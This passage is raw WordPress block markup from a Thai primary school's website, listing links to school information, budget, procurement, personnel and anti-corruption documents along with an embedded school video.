href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 